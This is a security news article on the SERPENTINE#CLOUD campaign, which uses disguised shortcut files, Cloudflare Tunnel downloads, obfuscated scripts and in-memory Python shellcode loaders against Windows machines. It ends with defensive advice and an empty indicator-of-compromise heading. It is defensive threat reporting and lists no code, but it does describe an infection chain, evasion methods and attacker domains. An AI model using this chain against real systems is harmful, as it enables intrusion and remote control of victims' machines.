Python Malware Targets Windows Systems Through Cloudflare Tunnels Exploited by Hackers

A new wave of cyberattacks, dubbed SERPENTINE#CLOUD, is leveraging Python, Cloudflare tunneling services, and deceptive file tactics to compromise Windows computers worldwide stealthily.

This evolving campaign, uncovered by Securonix researchers, exhibits a multi-layered infection chain that blends social engineering with advanced technical evasion, marking a concerning shift in how malware can bypass traditional security controls.

Initial Infection: Disguised Shortcuts and Phishing Lures

The attack begins with a well-orchestrated phishing campaign, where victims receive emails offering invoice or payment-related documents.

Attached or linked within are ZIP files containing malicious shortcut (.lnk) files made to look like harmless PDFs.

What sets this campaign apart is the use of customized icons and file names that conceal their true nature, even if users have file extensions visible in Windows Explorer.

Once executed, these .lnk files trigger a sophisticated sequence of events. Using built-in Windows utilities such as cmd.exe and robocopy, the malware silently downloads additional payloads via WebDAV over HTTPS from attacker-controlled Cloudflare Tunnel subdomains, such as flour-riding-merit-refers.trycloudflare.com.

Cloudflare Tunnels are intended for legitimate remote access and testing, but in this campaign, they provide a secure, encrypted channel for malware distribution, making network monitoring and attribution far more difficult.

Technical Sophistication: Obfuscated Payloads and Modular Execution

The next stage involves executing downloaded scripts typically Windows Script Files (WSF) or batch files, that further obfuscate and modularize the attack chain. For example, after the initial .lnk file executes, it retrieves a script like tank.wsf, which in turn downloads and runs a highly obfuscated batch file (kiki.bat).

These scripts employ advanced obfuscation techniques, including encoding and dynamic command construction, to evade detection by antivirus and endpoint protection platforms.

The batch scripts serve as primary delivery mechanisms, downloading compressed Python packages and additional malicious scripts.

These downloads and extractions take place in the user’s Contacts directory, an unconventional path that often goes unnoticed by security tools.

The scripts then establish persistence by dropping VBS and batch files into the Windows startup folder, ensuring continued execution upon system reboot.

Memory-Resident Malware and Remote Control

At the heart of this campaign are Python-based shellcode loaders, designed to decrypt and execute payloads entirely in memory. The main loader, run.py, uses XOR encryption and leverages native Windows APIs to inject shellcode into a legitimate process such as notepad.exe.

This Early Bird APC injection technique enables malicious code to execute before the process performs its intended functions, effectively hiding the malware from many endpoint detection and response (EDR) solutions.

The final payload, often packed with the open-source Donut loader, is decrypted and executed in memory, leaving minimal forensic evidence on disk.

Once activated, the malware beacons out to command and control (C2) servers hosted on both Cloudflare tunnel subdomains and custom domains, giving attackers full remote control over infected machines.

Commonly observed C2 infrastructure includes domains like nhvncpure.shop and dynamic DNS services such as duckdns.org.

Conclusion and Recommendations

The SERPENTINE#CLOUD campaign highlights the growing sophistication of cybercriminal tactics, blending social engineering, legitimate web services, and in-memory execution to evade detection.

Organizations are advised to implement strict email filtering, monitor unusual script execution in non-standard directories, and establish robust endpoint logging to detect and respond to advanced threats.

As attackers continue to innovate, vigilance and adaptive security measures remain the best defense against these evolving risks.

Indicator of Compromise